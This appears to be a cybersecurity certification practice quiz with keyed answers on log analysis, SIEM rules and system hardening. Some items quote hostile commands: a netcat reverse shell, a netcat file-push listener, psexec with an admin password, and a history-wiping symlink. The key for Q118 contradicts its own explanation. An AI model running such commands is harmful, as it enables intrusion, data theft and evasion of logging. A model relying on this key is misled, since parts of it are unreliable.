Brandon needs to deploy containers with different purposes, data sensitivity levels, and threat postures to his container environment. How should he group them?
- Segment containers by purpose
- Segment containers by data sensitivity
- Segment containers by threat model
- All of the above
All of the above
Where possible, NIST recommends segmenting containers by purpose, data sensitivity, and threat model so that each group runs on a separate OS kernel.
NIST SP 800-190
This publication explains the potential security concerns associated with the use of containers and provides recommendations for addressing these concerns.
80- Answer the question based on your knowledge of container security and the following scenario.
Brandon has been tasked with designing the security model for container use in his organization. He is working from the NIST SP 800‐190 document and wants to follow NIST recommendations wherever possible.
What issues should Brandon consider before choosing to use the vulnerability management tools he has in his non‐container‐based security environment?
- Vulnerability management tools may make assumptions about host durability.
- Vulnerability management tools may make assumptions about update mechanisms and frequencies.
- Both A and B.
- Neither A nor B.
Both A and B.
The NIST 800‐190 guidelines note that traditional vulnerability management tools may make assumptions like those in options A and B regarding the systems and applications they are scanning. Since containers are ephemeral and may be updated and changed very frequently, a traditional vulnerability scanning and management approach is likely to be a poor fit for a containerized environment.
81- What key functionality do enterprise privileged account management tools provide?
- Password creation
- Access control to individual systems
- Entitlement management across multiple systems
- Account expiration tools
Entitlement management across multiple systems
The most distinctive feature of privileged account management tools for enterprise use is the ability to manage entitlements across multiple systems throughout an enterprise IT environment. Broader identity and access management systems for enterprises provide user account management and life‐cycle services, including account expiration tools and password life‐cycle management capabilities.
82- Amira wants to deploy an open standard–based single sign‐on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers?
- LDAP
- SAML
- OAuth
- OpenID Connect
SAML
SAML provides all of the capabilities Amira is looking for. Unlike SAML, OAuth is an authorization standard, not an authentication standard. LDAP provides a directory and can be used for authentication but would need additional tools to be used as described. Finally, OpenID Connect is an authentication layer on top of OAuth, which is an authorization framework. Together, they would also meet the needs described here, but individually they do not.
83- Adam is testing code written for a client‐server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next?
- If the server stores data in unencrypted form
- If the traffic is unencrypted
- If the systems are on the same network
- If usernames and passwords are sent as part of the traffic
If the traffic is unencrypted
Adam knows that TCP/80 is the normal port for unencrypted HTTP traffic. As soon as he sees the traffic, he should immediately check if the traffic is unencrypted. If it is, his first recommendation will likely be to switch to TLS encrypted traffic. Once that is complete, he can worry about whether data is encrypted at rest and if usernames and passwords are passed as part of the traffic, which might be acceptable if it was protected with TLS!
85- Elaine’s team has deployed an application to a cloud‐hosted serverless environment. Which of the following security tools can she use in that environment?
- Endpoint antivirus
- Endpoint DLP
- IDS for the serverless environment
- None of the above
None of the above
Serverless environments are a shared service, and since there is not a system that is accessible to consumers, there is nowhere to install endpoint tools. Similarly, network IPSs cannot be placed in front of a shared resource. Elaine should also be aware that any flaw with the underlying serverless environment will likely impact all of the service hosting systems.
86- Lucca needs to explain the benefits of network segmentation to the leadership of his organization. Which of the following is not a common benefit of segmentation?
- Decreasing the attack surface
- Increasing the number of systems in a network segment
- Limiting the scope of regulatory compliance efforts
- Increasing availability in the case of an issue or attack
Increasing the number of systems in a network segment
Segmentation is typically used to decrease the number of systems in a network segment, rather than to increase it. Segmentation is often used to decrease an organization’s attack surface by moving systems that don’t need to be exposed to a protected segment. It can also be used to limit compliance impact by removing systems from a compliance zone that do not need to be part of it. Finally, limiting the number of systems or devices in a segment or keeping potentially problematic systems in an isolated network segment can help increase availability.
88- Nathan is designing the logging infrastructure for his company and wants to ensure that a compromise of a system will not result in the loss of that system’s logs. What should he do to protect the logs?
- Limit log access to administrators.
- Encrypt the logs.
- Rename the log files from their common name.
- Send the logs to a remote server.
Send the logs to a remote server.
Nathan’s best option is to send the logs to a remote server. The server should be protected to ensure that the same exploits that might compromise other systems will not impact the secure log storage server or service. In many organizations, a SIEM device or security logging tool like ELK or Splunk may be used to store and work with these logs.
89- Ansel knows he wants to use federated identities in a project he is working on. Which of the following should not be among his choices for a federated identity protocol?
- OpenID
- SAML
- OAuth
- Authman
Authman
OpenID, SAML, and OAuth are all commonly used protocols for federated identity. Ansel will need to better understand what the use cases for federated identity are in his environment and which organizations he will federate with before he chooses a protocol to implement and may eventually need to support more than one. Authman is a tool used to manage web user login files and is not a protocol.
90- James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
- The malware is polymorphic and is being identified as multiple viruses because it is changing.
- Different antimalware engines call the same malware package by different names.
- VirusTotal has likely misidentified the malware package, and this is a false positive.
- The malware contains multiple malware packages, resulting in the matches.
Different antimalware engines call the same malware package by different names.
Sites like VirusTotal run multiple antimalware engines, which may use different names for malware packages. This can result in a malware package apparently matching multiple different infections.
92- Abul wants to identify typical behavior on a Windows system using a built‐in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real‐time performance and over a period of time?
- sysmon
- sysgraph
- resmon
- resgraph
resmon
The Windows Resource Monitor (resmon.exe) application is a useful tool to both see real‐time data and graph it over time, allowing Abul to watch for spikes and drops in usage that may indicate abnormal behavior.
93- The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
- Calculating minimum viable signature length
- Binary fingerprinting to identify the malware author
- Building a similarity graph of similar functions across binaries
- Heuristic code analysis of development techniques
Building a similarity graph of similar functions across binaries
Binary diffing looks at multiple potentially related binaries that have anti‐reverse‐engineering tools run on them and looks for similarities. Graphs map this data, helping the tool identify malware families despite the protections that malware authors bake in. As you might have guessed, the rest of the answers for this question were made up.
94- What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user’s workstation?
- A scripted application installation
- Remote execution of code
- A scripted application uninstallation
- A zero‐day attack
Remote execution of code
PowerShell, wmic, and winrm.vbs are all commonly used for remote execution of code or scripts, and finding them in use on a typical workstation should cause you to be worried as most users will never use any of the three.
96- Lucy is an SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
- Heuristic
- Behavior
- Availability
- Anomaly
Availability
Availability analysis targets whether a system or service is working as expected. Although a SIEM may not have direct availability analysis capabilities, reporting on when logs or other data is not received from source systems can help detect outages. Ideally, Lucy’s organization should be using a system monitoring tool that can alarm on availability issues as well as common system problems such as excessive memory, network, disk, or CPU usage.
98- Lucy is an SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
- Trend
- Availability
- Heuristic
- Behavior
Behavior
Lucy has configured a behavior‐based detection. It is likely that a reasonable percentage of the detections will be legitimate travel for users who typically do not leave the country, but pairing this behavioral detection with other behavioral or anomaly detections can help determine if the login is legitimate.
100- Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
- A NetBIOS file share
- A RADIUS connection
- An RDP connection
- A Kerberos connection
An RDP connection
RDP operates over TCP 3389. Most corporate workstations won’t have RDP turned on inbound to workstations, and Suki may find that she has discovered a compromise or other behavior that her organization may not want to occur.
101- Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
- The sudoers file
- /var/log/sudo
- /var/log/auth.log
- Root’s .bash_log
/var/log/auth.log
The auth.log file on Linux systems will capture sudo events. A knowledgeable attacker is likely to erase or modify the auth.log file, so Ian should make sure that the system is sending these events via syslog to a trusted secure host. The sudoers file stored in /etc/sudoers contains details of which users can use sudo and what rights they have. There is not a file called /var/log/sudo, and root’s .bash_log file might contain commands that root has run but won’t have details of the sudo event—there’s no reason for root to sudo to root!
102- What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
- How often the directory is accessed
- If files in the directory have changed
- If sensitive data was copied out of the directory
- Who has viewed files in the directory
If files in the directory have changed
Tripwire can monitor files and directories for changes, which means Gabby can use it to monitor for files in a directory that have changed. It will not tell you how often the directory is accessed, who viewed files, or if sensitive data was copied out of the directory.
103- While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe
- The user has opened a command prompt on their workstation.
- The user has opened a command prompt on the desktop of a remote workstation.
- The user has opened an interactive command prompt as administrator on a remote workstation.
- The user has opened a command prompt on their workstation as Administrator.
The user has opened an interactive command prompt as administrator on a remote workstation.
Even if you’re not familiar with the PS tools, you can use your knowledge of Windows command‐line tools to figure out what is happening here. We see a remote workstation (it is highly unlikely you would connect to your own workstation this way!) indicated by the \\ip.address, a -u flag likely to mean user ID with the administrator listed, and a -p for password. We know that cmd.exe is the Windows command prompt, so it is reasonable and correct to assume that this will open a remote command prompt for interactive use. If this is a user who isn’t an administrator, Charlene needs to start an incident investigation right away.
105- While reviewing Windows event logs for a Windows system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
- The system was shut down.
- Another antivirus program has interfered with the scan.
- The user disabled the scan.
- The scan found a file it was unable to scan.
Another antivirus program has interfered with the scan.
First, Kai should check the scan log to review the scan type and error code to check it via the Microsoft support site. The most likely cause from the list of provided answers is a conflict with another security product. While security practitioners often worry about malware on systems, a common cause of scan failures is a second installed antivirus package. If Kai doesn’t find a second antivirus package installed, she should conduct a scan using another tool to see if malware may be the issue.
106- Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
- Blocklisting
- IP reputation
- Allowlisting
- Domain reputation
Allowlisting
Blocklisting known bad IP addresses (previously known as blacklisting), as well as the use of both domain and IP reputation services, can help Charles accomplish his task. Allowlisting (previously known as whitelisting) allows only known addresses through and does not flag known bad addresses.
108- While reviewing email headers, Saanvi notices an entry that reads as follows:
From: “John Smith, CIO” jsmith@example.com with a Received: parameter that shows mail.demo.com [10.74.19.11].
Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?
- John Smith’s email was forwarded by someone at demo.com.
- John Smith’s email was sent to someone at demo.com.
- The headers were forged to make it appear to have come from John Smith.
- The mail.demo.com server is a trusted email forwarding partner for example.com.
The headers were forged to make it appear to have come from John Smith.
The most likely scenario in this circumstance is that the headers were forged to make the email appear to come from example.com, but the email was actually sent from mail.demo.com.
109- Fiona wants to prevent email impersonation of individuals inside her company. What technology can best help prevent this?
- IMAP
- SPF
- DKIM
- DMARC
DMARC
While SPF and DKIM can help, combining them in the form of DMARC can limit trusted senders to only a known list and prove that the domain is the domain that is sending the email; this prevents email impersonation when other organizations also use DMARC.
111- Ian wants to leverage multiple threat flows and is frustrated that they come in different formats. What type of tool might best assist him in combining this information and using it to further streamline his operations?
- IPS
- OCSP
- SOAR
- SAML
SOAR
Security orchestration, automation, and response (SOAR) systems are designed to correlate information and may be able to combine this information. This is especially true if the system and feeds make use of the Structured Threat Information Expression language (STIX) and TAXII, the protocol used to transfer threat intelligence. STIX and TAXII are open protocols that have been adopted to allow multiple threat sources to be combined effectively. SAML is Security Assertion Markup Language, and OCSP is Online Certificate Status Protocol. Neither of those is useful in processing threat information.
OCSP
Online Certificate Status Protocol
an internet protocol that allows applications to check the revocation status of a digital certificate in real-time, essentially verifying if a certificate is still valid or has been revoked by the issuing authority, providing a more up-to-date status compared to traditional Certificate Revocation Lists
SPF
Sender Policy Framework (SPF) is an email authentication technique that allows organizations to publish a list of their authorized email servers, and systems not listed in SPF will be rejected
DKIM
DomainKeys Identified Mail (DKIM) allows organizations to add content to messages to identify them as being from their domain by signing both the body of the message and elements of the header, helping to ensure that the message is actually from the organization it claims to be from
DMARC
Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a protocol that uses SPF and DKIM to determine whether an email message is authentic, allowing you to choose to reject or quarantine messages that are not sent by a DMARC-supporting sender
port 1521
Oracle databases default to TCP port 1521
113- During a log review, Mei sees repeated firewall entries, as shown here:
Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
What service is the remote system most likely attempting to access?
- H.323
- SNMP
- MS‐SQL
- Oracle
Oracle
Oracle databases default to TCP port 1521. Traffic from the “outside” system is being denied when it attempts to access an internal system via that port.
While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
- A packer
- A crypter
- A shuffler
- A protector
A shuffler
Packers, or runtime packers, are tools that self‐extract when run, making the code harder to reverse‐engineer. Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read. Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies. Shufflers were made up for this question.
Packer
Packers, or runtime packers, are tools that self‐extract when run, making the code harder to reverse‐engineer.
Crypter
Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read.
Protector
Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies.
115- While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP address. What should Nara report has occurred?
[21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
- A denial‐of‐service attack
- A vulnerability scan
- A port scan
- A directory traversal attack
A vulnerability scan
Testing for common sample and default files is a common tactic for vulnerability scanners. Nara can reasonably presume that her Apache web server was scanned using a vulnerability scanner.
117- Cormac needs to lock down a Windows workstation that has recently been scanned using Nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?
root@kali:~# nmap -sS -P0 -p 0-65535 192.168.1.14
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT
Nmap scan report for dynamo (192.168.1.14)
Host is up (0.00023s latency).
Not shown: 65524 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
2869/tcp open icslap
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7680/tcp open unknown
22350/tcp open CodeMeter
49677/tcp open unknown
MAC Address: BC:5F:F4:7B:4B:7D (ASRock Incorporation)
- 80, 135, 139, and 445.
- 80, 445, and 3389.
- 135, 139, and 445.
- No ports should be open.
No ports should be open.
The uses described for the workstation that Cormac is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system.
118- Frank’s team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process.action = 'launch'
- Processes other than explorer.exe typically do not launch command prompts.
- cmd.exe should never launch explorer.exe.
- explorer.exe provides administrative access to systems.
- cmd.exe runs as administrator by default when launched outside of Explorer.
cmd.exe should never launch explorer.exe.
For most Windows user workstations, launches of cmd.exe by programs other than Explorer are not typical. This script will identify those launches and will alarm on them.
119- Mark writes a script to pull data from his security data repository. The script includes the following query:
select source.name, data.process.cmd, count(*) AS hostcount from windows-events where type = 'sysmon' AND data.process.action = 'launch' AND data.process.image.file = 'reg.exe' AND data.process.parentImage.file = 'cmd.exe'
He then queries the returned data using the following script:
select source.name, data.process.cmd, count(*) AS hostcount from network-events where type = 'sysmon' AND data.process.action = 'launch' AND data.process.image.file = 'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'
What events will Mark see?
- Uses of explorer.exe where it is launched by cmd.exe
- Registry edits launched via the command line from Explorer
- Registry edits launched via explorer.exe that modify cmd.exe
- Uses of cmd.exe where it is launched by reg.exe
Registry edits launched via the command line from Explorer
The first query will identify times when the reg.exe was launched by cmd.exe. If the same data is searched to correlate with launches of cmd.exe by explorer.exe, Mark will know when registry edits were launched via the command line (cmd.exe) from Explorer—a process that typically means users have edited the registry, which should be an uncommon event in most organizations and is likely to be a security concern.
120- Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
- Enable host firewalls.
- Install patches for those services.
- Turn off the services for each appliance.
- Place a network firewall between the devices and the rest of the network.
Place a network firewall between the devices and the rest of the network.
Mateo’s only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don’t have patches available, and many appliances do not allow the services they provide to be disabled or modified.
memstat
used to check the state of memcached server
top
command will show a dynamic, real‐time list of running processes
125- While reviewing output from the netstat command, John sees the following output. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
- Capture traffic to 151.101.2.69 using Wireshark.
- Initiate the organization’s incident response plan.
- Check to see if 151.101.2.69 is a valid Microsoft address.
- Ignore it; this is a false positive.
Initiate the organization’s incident response plan.
John has discovered a program that is both accepting connections and has an open connection, neither of which are typical for the Minesweeper game. Attackers often disguise Trojans as innocuous applications, so John should follow his organization’s incident response plan.
EDR
Endpoint detection and response
127- While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
- Enabling the Bash history
- Appending the contents of /dev/null to the Bash history
- Logging all shell commands to /dev/null
- Allowing remote access from the null shell
Logging all shell commands to /dev/null
This command will prevent commands entered at the Bash shell prompt from being logged, as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain administrative access from hiding their tracks.
128- Charles wants to determine whether a message he received was forwarded by analyzing the headers of the message. How can he determine this?
- Reviewing the Message‐ID to see if it has been incremented.
- Checking for the In‐Reply‐To field.
- Checking for the References field.
- You cannot determine if a message was forwarded by analyzing the headers.
You cannot determine if a message was forwarded by analyzing the headers.
When an email is forwarded, a new message with a new Message‐ID header will be created. The In‐Reply‐To and References field will also be set as normal. The best option that Charles has is to look for clues like a subject line that reads “FWD”—something that is easily changed.
129- While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
-rwxr-xr-x 1 root root 57 Mar 1 2013 paros
-rwxr-xr-x 1 root root 22256 May 13 2015 parse-edid
-rwxr-xr-x 1 root root 77248 Nov 2 2015 partx
lrwxrwxrwx 1 root root 15 Jan 28 2016 passmas -> expect_passmass
-rwsr-xr-x 1 root root 50000 Aug 5 18:23 passwd (in red)
-rwxr-xr-x 1 root root 31240 Jan 18 2016 paste
-rwxr-xr-x 1 root root 67 May 16 2013 paster
-rwxr-xr-x 1 root root 70 May 16 2013 paster2.7
-rwxr-xr-x 1 root root 14792 Nov 6 2015 pasuspender
-rwxr-xr-x 1 root root 128629 Jan 28 2016 patator
-rwxr-xr-x 1 root root 151272 Mar 7 2015 patch
lrwxrwxrwx 1 root root 3 Jan 28 2016 patchwork -> dot
-rwxr-xr-x 1 root root 31032 Dec 12 2015 patgen
-rwxr-xr-x 1 root root 31240 Jan 18 2016 pathchk
-rwxr-xr-x 1 root root 14648 Nov 6 2015 pax11publish
- Continue to search for other changes.
- Run diff against the password file.
- Immediately change her password.
- Check the passwd binary against a known good version.
Check the passwd binary against a known good version.
The passwd binary stands out as having recently changed. This may be innocuous, but if Marta believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious version. She should check the binary against a known good version and then follow her incident response process if it doesn’t match.
130- Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes?
- Scheduled tasks
- Service replacement
- Service creation
- Autostart registry keys
Service replacement
Scheduled tasks, service creation, and autostart registry keys are all commonly found on Windows systems for legitimate purposes. Replacing services is far less common unless a known upgrade or patch has occurred.
131- Matt is reviewing a query that his team wrote for their threat‐hunting process. What will the following query warn them about?
select timeInterval(date, '4h'), data.login.user, count(distinct data.login.machine.name) as machinecount from network-events where data.winevent.EventID = 4624 having machinecount > 1
- Users who log in more than once a day
- Users who are logged in to more than one machine within four hours
- Users who do not log in for more than four hours
- Users who do not log in to more than one machine in four hours
Users who are logged in to more than one machine within four hours
Even if you don’t recognize the Windows Event ID, this query provides a number of useful clues. First, it has an interval of four hours, so you know a time frame. Next, it lists data.login.user, which means you are likely querying user logins. Finally, it includes machine count and >1, so you can determine that it is looking for more than one system that has been logged in to. Taken together, this means that the query looks for users who have logged in to more than one machine within any given four‐hour period. Matt may want to tune this to a shorter time period, because false positives may result for technical support staff, but since most users won’t log in to more than one machine, this could be a very useful threat‐hunting query.
134- Damian has discovered that systems throughout his organization have been compromised for more than a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
- Criminal
- Hacktivist
- APT
- Unknown
APT
Damian has likely encountered an advanced persistent threat (APT). They are characterized as extremely well‐resourced actors whose compromises typically have an extended dwell time and the ability to scale capabilities to counter defenders over time.
135- While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon::16820:0:99999:7:::
> bin::16820:0:99999:7:::
> sys::16820:0:99999:7:::
> sync::16820:0:99999:7:::
> games::16820:0:99999:7:::
> man::16820:0:99999:7:::
> lp::16820:0:99999:7:::
> mail::16820:0:99999:7:::
> news::16820:0:99999:7:::
> uucp::16820:0:99999:7:::
> proxy::16820:0:99999:7:::
> www-data::16820:0:99999:7:::
> backup::16820:0:99999:7:::
> list::16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
- The root account has been compromised.
- An account named daemon has been added.
- The shadow password file has been modified.
- /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
/etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
Linux and Unix systems typically keep user account information stored in /etc/passwd, and /etc/shadow contains password and account expiration information. Using diff between the two files is not a useful strategy in this scenario.
137- Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email‐based attacks?
- The email’s headers
- Embedded links in the email
- Attachments to the email
- The email signature block
The email signature block
Although you may want to analyze the email signature block, it is not likely to contain information that will help you identify a phishing message, as the signature text may have been created by the attacker. It is important to note that the signature block refers to the information provided by the user at the end of an email message, not the use of a digital signature. You should analyze the entire body of an email for malicious links and payloads. Header data is often checked against IP reputation databases and other checks that can help limit email from spam domains and known malicious senders.
138- Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
- Removing all links in email
- Redirecting links in email to a proxy
- Scanning all email using an antimalware tool
- Using a DNS blackhole and IP reputation list
Scanning all email using an antimalware tool
The most common solution to identifying malicious embedded links in email is to use an antimalware software package to scan all emails. They typically include tools that combine IP and domain reputation lists as well as other heuristic and analytical tools to help identify malicious and unwanted links.
141- Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
- Add an iptables rule blocking root logins.
- Add root to the sudoers group.
- Change sshd_config to deny root login.
- Add a network IPS rule to block root logins.
Change sshd_config to deny root login.
Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Singh’s goal.
142- Azra’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:
at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
- It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.
- It uses the AT command to dial a remote host via NetBIOS.
- It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 p.m.
- It creates a VPN connection to 10.1.2.3 every five days at 8:30 p.m. GST.
It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.
The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Azra should be concerned, as this allows traffic in that otherwise might be blocked.
143- While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
- A user has attempted to reauthenticate too many times.
- PAM is configured for three retries and will reject any additional retries in the same session.
- Fail2ban has blocked the SSH login attempts.
- Root is attempting to log in via SSH from the local host.
Fail2ban has blocked the SSH login attempts.
This output shows a brute‐force attack run against the localhost’s root account using SSH. This resulted in the root user attempting to reauthenticate too many times, and PAM has blocked the retries. Fail2ban is not set up for this service; thus, this is the one item that has not occurred. If it was enabled, the Fail2ban log would read something like 2019-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Ban 127.0.0.1.
145- While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
nc -l -p 43501 < example.zip
What happened?
- The user set up a reverse shell running as example.zip.
- The user set up netcat as a listener to push example.zip.
- The user set up a remote shell running as example.zip.
- The user set up netcat to receive example.zip.
The user set up netcat as a listener to push example.zip.
The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.
147- Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows workstations?
- Using application allowlisting to prevent all prohibited programs from running.
- Using Windows Defender and adding the game to the blocklist file.
- Listing it in the Blocked Programs list via secpol.msc.
- You cannot blocklist applications in Windows 10 without a third‐party application.
Using application allowlisting to prevent all prohibited programs from running.
Windows supports application allowlisting (whitelisting). Lukas can allowlist his allowed programs and then set the default mode to Disallowed, preventing all other applications from running and thus blocking the application. This can be a bit of a maintenance hassle but can be useful for high‐security environments, or those in which limiting what programs can run is critical.
148- Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
-rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
- User chuck has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.
- User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
- User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
- User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
Remember that rights are read from left to right as user rights, group rights, and then world rights. Here we have read, write, and execute (rwx) for chuck, rw for admingroup, and r for world.
Linux Permissions
- position 1: type (e.g., d for directory; - for file; l for symbolic link, etc.)
- positions 2-4: owner permissions
- positions 5-7: group permissions
- positions 8-10: others/world permissions
- special characters: s for SUID, t for sticky bit, etc.
Example:
-rwsr-xr-x 1 root root 50000 Aug 5 18:23 passwd
Reading the permissions, character by character:
- Position 1 (-): this is a regular file (not a directory or link)
- Owner permissions (positions 2-4):
  - r: the owner (root) can read this file
  - w: the owner can write to/modify this file
  - s: the SUID bit plus execute permission; when a regular user runs this program, it runs with the permissions of the file owner (root)
- Group permissions (positions 5-7):
  - r: users in the group (root) can read this file
  - -: users in the group cannot write to this file
  - x: users in the group can execute this file
- Others/world permissions (positions 8-10):
  - r: all other users can read this file
  - -: other users cannot write to this file
  - x: other users can execute this file
- In numeric form, this is represented as 4755:
  - 4 for the special SUID bit
  - 7 (4+2+1) for owner permissions (read+write+execute)
  - 5 (4+0+1) for group permissions (read+execute)
  - 5 (4+0+1) for others permissions (read+execute)
This permission set allows any user to run the passwd command to change their password, while the SUID bit ensures the program runs with root privileges (which are needed to update the password file).
149- While reviewing web server logs, Danielle notices the following entry. What occurred?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
- A theme was changed.
- A file was not found.
- An attempt to edit the 404 page.
- The 404 page was displayed.
An attempt to edit the 404 page.
